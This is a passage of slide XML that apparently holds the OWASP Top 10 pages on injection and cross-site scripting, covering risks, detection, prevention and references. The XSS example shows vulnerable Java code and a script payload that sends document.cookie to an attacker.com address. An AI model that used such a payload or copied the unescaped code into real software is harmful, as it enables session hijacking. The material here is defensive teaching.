              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the worst case, the attacker uses this weakness to invoke special stored procedures in the database that enable a complete takeover of the database and possibly even the server hosting the database.</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Injection?</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is vulnerable to injection is to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> use of interpreters clearly separates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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5"/>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SQL Injection Prevention Cheat Sheet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Injection Flaws Article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Encoder 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ESAPI Input Validation API</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ASVS: Output Encoding/Escaping Requirements (V6)</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OWASP Testing Guide: Chapter on SQL Injection Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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OWASP Code Review Guide: Chapter on SQL Injection</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OWASP Code Review Guide: Command Injection</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5"/>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77 on Command Injection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CWE Entry 89 on SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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Injection?</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injection requires keeping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data separate from commands and queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface.  Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has some of these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>escaping routines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive or “white list” input validation with appropriate canonicalization is also recommended, but is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a complete defense as many applications require special characters in their input. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has an extensible library of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>white list input validation routines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="997424"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2450461" y="1073877"/>
              <a:ext cx="1449387" cy="381000"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="288"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30"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31"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11" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="476250" y="997424"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12"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13"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14"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15"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16"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18"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2"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65"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79" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="30"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93"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29"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113" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="29"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
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 35"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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56447"/>
          <a:ext cx="6858000" cy="253689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989">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9463">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VERY WIDESPREAD</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82104">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send </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data to the system,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> including external users, internal users, and administrators.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.</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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data in</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> a page sent to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>browser without properly validating or escaping</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>that content. There are three known types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>of XSS flaws: 1) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, 2) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and 3) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>DOM based XSS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Detection of most XSS flaws is fairly easy via testing or code analysis.</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execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hijack the user’s browser using malware, etc</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system and all the data it processes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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' type='TEXT‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("CC") + "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker modifies the ‘CC’ parameter in their browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  'http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See A5 for info on CSRF.</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XSS?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You need to ensure that all user supplied input sent back to the browser is verified to be safe (via input validation), and that user input is properly escaped before it is included in the output page. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content that might get executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both static and dynamic tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and manual penetration testing, in addition to any automated approaches in use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools.</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6"/>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XSS Prevention Cheat Sheet</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Cross-Site Scripting Article</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ESAPI Project Home Page </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ESAPI Encoder API</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ASVS: Output Encoding/Escaping Requirements (V6)</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ASVS: Input Validation Requirements (V5)</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Testing Guide: 1st 3 Chapters on Data Validation Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1"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OWASP Code Review Guide: Chapter on XSS Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng"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6"/>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79 on Cross-Site Scripting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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>RSnake’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> XSS Attack Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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XSS?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XSS requires keeping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data separate from active browser content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to properly escape all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them. See the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for more information about data escaping techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
